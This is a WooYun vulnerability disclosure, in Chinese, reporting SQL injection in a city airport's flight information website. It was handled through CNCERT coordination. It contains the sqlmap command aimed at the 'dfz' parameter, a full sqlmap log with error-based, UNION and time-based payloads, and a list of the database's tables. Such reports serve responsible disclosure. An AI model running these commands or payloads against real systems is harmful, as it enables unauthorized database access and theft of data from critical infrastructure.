当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165003

漏洞标题:某市国际机场主站SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-12-29 01:38

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-29: 细节已通知厂商并且等待厂商处理中
2016-01-05: 厂商已经确认,细节仅向厂商公开
2016-01-15: 细节向核心白帽子及相关领域专家公开
2016-01-25: 细节向普通白帽子公开
2016-02-04: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

某市国际机场主站SQL注入漏洞

详细说明:

【注入点】:http://**.**.**.**/flight/FlightEvent2.asp?fanwei=%B3%F6%B8%DB%BA%BD%B0%E0&dfz=%C8%AB%B2%BF&hbh=&submit=+%CC%E1%BD%BB+
【dfz参数存在注入】:python sqlmap.py -u "http://**.**.**.**/flight/FlightEvent2.asp?fanwei=%B3%F6%B8%DB%BA%BD%B0%E0&dfz=%C8%AB%B2%BF&hbh=&submit=+%CC%E1%BD%BB+" -p dfz --current-db
【sqlmap截图】:
当前数据库信息:

QQ截图20151226192850.png


数据库信息

QQ截图20151226193140.png


【数据库】:

Database: fids
[67 tables]
+------------------------------------+
| AtcEvent                           |
| ControlFIDS                        |
| ControlTTS                         |
| Convert_Records                    |
| Ctrl_Bag_V1new                     |
| Ctrl_Bag_V1new                     |
| DictionaryAirways                  |
| DictionaryBridge                   |
| DictionaryCause_bak                |
| DictionaryCause_bak                |
| DictionaryCommand                  |
| DictionaryMsg                      |
| DictionaryPlane                    |
| DictionaryProperty                 |
| DictionaryStatus                   |
| DictionaryTTSBAK                   |
| DictionaryTTSBAK                   |
| DictionaryToponym                  |
| FlightEventTest                    |
| FlightEvent_temp                   |
| FlightEvent_temp                   |
| FlightPlan                         |
| FlightSchedule                     |
| FlightTelegram                     |
| Gate                               |
| Handle_CtrlBagV1_Records           |
| INFOAIR_GATE                       |
| MP3LIB                             |
| New_update_log_help_lei            |
| New_update_log_help_neirong        |
| New_update_log_help_userlist       |
| ONextDaySched_TEMP                 |
| PbsArea                            |
| PlanToPrint                        |
| Results                            |
| TempFlight                         |
| Texmsg                             |
| TexmsgTest                         |
| TimeSetting                        |
| djk_hangban                        |
| dtproperties                       |
| hangban                            |
| historyofflightevent               |
| hx_test                            |
| new_hx_fbxx2_fl_1                  |
| new_hx_fbxx2_fl_2                  |
| new_hx_fbxx2_log                   |
| new_hx_fbxx2_neirong               |
| new_hx_fbxx_fl_1                   |
| new_hx_fbxx_fl_2                   |
| new_hx_fbxx_log                    |
| new_hx_fbxx_neirong                |
| new_hx_hangban_bak                 |
| new_hx_hangban_bak                 |
| new_hx_jc_cx_temp                  |
| new_hx_jc_dm                       |
| new_hx_loginlog                    |
| new_hx_t                           |
| new_hx_userlist                    |
| new_hx_warm                        |
| sysconstraints                     |
| syssegments                        |
| view_of_FlightEvent_ForChinaMobile |
| view_of_FlightEvent_ForPBS_Only    |
| view_of_FlightEvent_a              |
| view_of_FlightEvent_a              |
| view_of_tts                        |
+------------------------------------+

漏洞证明:

【sqlmap全过程】

[19:01:37] [INFO] testing connection to the target URL
[19:01:44] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap got a refresh request (redirect like response common to login pages). Do
you want to apply the refresh from now on (or stay on the original page)? [Y/n]
[19:02:31] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[19:02:47] [INFO] target URL is stable
[19:02:48] [INFO] heuristics detected web page charset 'GB2312'
[19:02:48] [INFO] heuristic (basic) test shows that GET parameter 'dfz' might be
 injectable (possible DBMS: 'Microsoft SQL Server')
[19:02:49] [INFO] testing for SQL injection on GET parameter 'dfz'
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL S
erver'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'Microsoft SQL Server' extending provided l
evel (1) and risk (1) values? [Y/n]
[19:02:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:04:55] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par
ameter replace (original value)'
[19:05:17] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORD
ER BY clause'
[19:05:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error
 blind queries'
[19:07:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[19:07:56] [INFO] GET parameter 'dfz' is 'Microsoft SQL Server/Sybase AND error-
based - WHERE or HAVING clause' injectable
[19:07:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:07:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[19:07:56] [CRITICAL] considerable lagging has been detected in connection respo
nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or
 more)
[19:08:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:08:21] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query)'
[19:09:08] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query - comment)'
[19:10:08] [INFO] GET parameter 'dfz' seems to be 'Microsoft SQL Server/Sybase A
ND time-based blind (heavy query - comment)' injectable
[19:10:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:10:08] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[19:10:17] [WARNING] reflective value(s) found and filtering out
[19:10:17] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[19:10:54] [INFO] target URL appears to have 19 columns in query
[19:12:46] [INFO] GET parameter 'dfz' is 'Generic UNION query (NULL) - 1 to 20 c
olumns' injectable
GET parameter 'dfz' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N]
sqlmap identified the following injection points with a total of 74 HTTP(s) requ
ests:
---
Parameter: dfz (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: fanwei=%B3%F6%B8%DB%BA%BD%B0%E0&dfz=%C8%AB%B2%BF' AND 6639=CONVERT(
INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN
(6639=6639) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR
(118)+CHAR(113))) AND 'PLlG'='PLlG&hbh=&submit= %CC%E1%BD%BB
    Type: UNION query
    Title: Generic UNION query (NULL) - 19 columns
    Payload: fanwei=%B3%F6%B8%DB%BA%BD%B0%E0&dfz=%C8%AB%B2%BF' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+
CHAR(112)+CHAR(107)+CHAR(98)+CHAR(113)+CHAR(86)+CHAR(70)+CHAR(79)+CHAR(98)+CHAR(
76)+CHAR(101)+CHAR(101)+CHAR(70)+CHAR(120)+CHAR(99)+CHAR(113)+CHAR(107)+CHAR(112
)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL-- &hbh=&submit= %CC%E1%BD%BB
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query - comme
nt)
    Payload: fanwei=%B3%F6%B8%DB%BA%BD%B0%E0&dfz=%C8%AB%B2%BF' AND 5168=(SELECT
COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys
4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--&hbh=&submit= %CC%E1%BD%B
B
---
[19:12:47] [INFO] testing Microsoft SQL Server
[19:12:48] [INFO] confirming Microsoft SQL Server
[19:12:52] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-05 16:44

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向民航行业测评中心通报,并抄报广西分中心协助处置,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评价